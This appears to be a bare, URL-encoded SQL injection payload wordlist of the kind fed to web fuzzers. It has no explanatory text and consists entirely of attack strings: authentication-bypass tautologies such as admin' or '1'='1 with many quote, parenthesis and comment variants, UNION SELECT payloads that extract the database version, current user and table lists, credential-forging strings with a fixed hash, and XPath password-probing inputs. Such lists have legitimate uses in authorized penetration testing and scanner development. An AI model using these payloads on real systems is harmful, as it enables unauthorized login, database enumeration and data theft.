'
'-'
'--
'%20'
'%20--
'%20%23
'%20–
'%20AND%201%3D0%20UNION%20ALL%20SELECT%20'',%20'81dc9bdb52d04dc20036dbd8313ed055
%20and%201%3D1
'%20and%201%3D'1
%20and%201%3D1–
'%20and%20a%3D'a
'%20and%20'one'%3D'one
'%20and%20'one'%3D'one–
'%20and%20substring(password/text(),1,1)%3D'7
'%20group%20by%20password%20having%201%3D1--
'%20group%20by%20userid%20having%201%3D1--
'%20group%20by%20username%20having%201%3D1--
%20like%20'%'
'%20or%20''-'
'%20or%20''%20'
'%20or%20%20%20%20%20%20%20%20%200%3D0%20%23
'%20or%20''%26'
'%20or%20''*'
'%20or%20''^'
'%20or%20''%3D'
%20or%200%3D0%20--
'%20or%200%3D0%20--
%20or%200%3D0%20%23
'%20or%200%3D0%20%23
%20or%200%3D0%20–
'%20or%200%3D0%20–
%20or%201%3D1
%20or%201%3D1--
'%20or%201%3D1
'%20or%201%3D1--
'%20or%20'1'%3D'1
'%20or%20'1'%3D'1'--
'%20or%201%3D1%20--
'%20or%201%3D1%20–
'%20or%201%3D1%20limit%201%20--%20-%2B
'%20or%201%3D1%20LIMIT%201;%23
%20or%201%3D1%23
'%20or%201%3D1%23
'%20or%20'1'%3D'1'%23
%20or%201%3D1/*
'%20or%201%3D1/*
'%20or%20'1'%3D'1'/*
'%20or%201%3D1;%23
%20or%201%3D1–
'%20or%201%3D1–
'%20or%20'1′%3D'1
'%20or%20a%3Da--
'%20or%20'a'%3D'a
'%20or%20a%3Da–
'%20or%20'one'%3D'one
'%20or%20'one'%3D'one–
%20or%20true
'%20or%20true--
'%20or%20uid%20like%20'%
'%20or%20uname%20like%20'%
'%20or%20user%20like%20'%
'%20or%20userid%20like%20'%
'%20or%20username%20like%20'%
'%20or%20'x'%3D'x
'%20OR%20'x'%3D'x'%23;
'%20UNION%20ALL%20SELECT%201,%20@@version;%23
'%20UNION%20ALL%20SELECT%20system_user(),user();%23
'%20UNION%20select%20table_schema,table_name%20FROM%20information_Schema.tables;%23
"%20--
"%20"
"%20%23
"%20AND%201%3D0%20UNION%20ALL%20SELECT%20"",%20"81dc9bdb52d04dc20036dbd8313ed055
"%20or%20""%20"
"%20or%20""-"
"%20or%20""%26"
"%20or%20""*"
"%20or%20""^"
"%20or%20""%3D"
"%20or%20"1"%3D"1
"%20or%20"1"%3D"1"--
"%20or%20"1"%3D"1"%23
"%20or%20"1"%3D"1"/*
"%20or%20"a"%3D"a
"%20or%20"x"%3D"x
"%20or%200%3D0%20--
"%20or%200%3D0%20%23
"%20or%200%3D0%20–
"%20or%201%3D1
"%20or%201%3D1--
"%20or%201%3D1%20--
"%20or%201%3D1%20–
"%20or%201%3D1%23
"%20or%201%3D1/*
"%20or%201%3D1–
"%20or%20true--
"-"
"%26"
")%20or%20"1"%3D"1
")%20or%20"1"%3D"1"--
")%20or%20"1"%3D"1"%23
")%20or%20"1"%3D"1"/*
")%20or%20("1"%3D"1
")%20or%20("1"%3D"1"--
")%20or%20("1"%3D"1"%23
")%20or%20("1"%3D"1"/*
")%20or%20("a"%3D"a
")%20or%20("x")%3D("x
")%20or%20true--
"))%20or%20(("x"))%3D(("x
"*"
"/*
"^"
"or%201%3D1%20or%20""%3D"
'%23
%'%20or%20'0'%3D'0
'%26'
')%20or%20('1'%3D'1
')%20or%20('1'%3D'1'--
')%20or%20('1'%3D'1--
')%20or%20('1'%3D'1'%23
')%20or%20('1'%3D'1'/*
)%20or%20('1′%3D'1–
')%20or%20('a'%3D'a
')%20or%20('a'%3D'a%20and%20hi")%20or%20("a"%3D"a
')%20or%20('x')%3D('x
')%20or%20('x'%3D'x
')%20or%20'1'%3D'1
')%20or%20'1'%3D'1'--
')%20or%20'1'%3D'1--
')%20or%20'1'%3D'1'%23
')%20or%20'1'%3D'1'/*
)%20or%20'1′%3D'1–
')%20or%20true--
'))%20or%20(('x'))%3D(('x
'*'
'/*
[1]
'^'
%3D
'%3D'%20'or'%20and%20'%3D'%20'or'
'%3D"or'
%3D%3D
1
1'
1'%20or%201.e(1)%20or%20'1'%3D'1
1%20or%201%3D1
1'%20or%20'1'%3D'1
1"
1/*!1111'*/
1/*'*/
1\
1`
1'||'asd'||'
1234%20'%20AND%201%3D0%20UNION%20ALL%20SELECT%20'admin',%20'81dc9bdb52d04dc20036dbd8313ed055
1234%20"%20AND%201%3D0%20UNION%20ALL%20SELECT%20"admin",%20"81dc9bdb52d04dc20036dbd8313ed055
1′)%20and%20'1′%3D'1–
admin'%20--
admin'%20%23
admin'%20and%20substring(password/text(),1,1)%3D'7
admin'%20or%201%3D1
admin'%20or%201%3D1--
admin'%20or%20'1'%3D'1
admin'%20or%20'1'%3D'1'--
admin'%20or%201%3D1%23
admin'%20or%20'1'%3D'1'%23
admin'%20or%201%3D1/*
admin'%20or%20'1'%3D'1'/*
admin"%20--
admin"%20%23
admin"%20or%20"1"%3D"1
admin"%20or%20"1"%3D"1"--
admin"%20or%20"1"%3D"1"%23
admin"%20or%20"1"%3D"1"/*
admin"%20or%201%3D1
admin"%20or%201%3D1--
admin"%20or%201%3D1%23
admin"%20or%201%3D1/*
admin")%20or%20"1"%3D"1
admin")%20or%20"1"%3D"1"--
admin")%20or%20"1"%3D"1"%23
admin")%20or%20"1"%3D"1"/*
admin")%20or%20("1"%3D"1
admin")%20or%20("1"%3D"1"--
admin")%20or%20("1"%3D"1"%23
admin")%20or%20("1"%3D"1"/*
admin"/*
admin"or%201%3D1%20or%20""%3D"
admin')%20or%20('1'%3D'1
admin')%20or%20('1'%3D'1'--
admin')%20or%20('1'%3D'1'%23
admin')%20or%20('1'%3D'1'/*
admin')%20or%20'1'%3D'1
admin')%20or%20'1'%3D'1'--
admin')%20or%20'1'%3D'1'%23
admin')%20or%20'1'%3D'1'/*
admin'/*
admin'or%201%3D1%20or%20''%3D'
or%201%3D1
or%201%3D1--
'or%201%3D1%20or%20''%3D'
or%201%3D1%23
or%201%3D1/*
or%20true--
'or''%3D'
'or'1%3D1
'or'1%3D1′
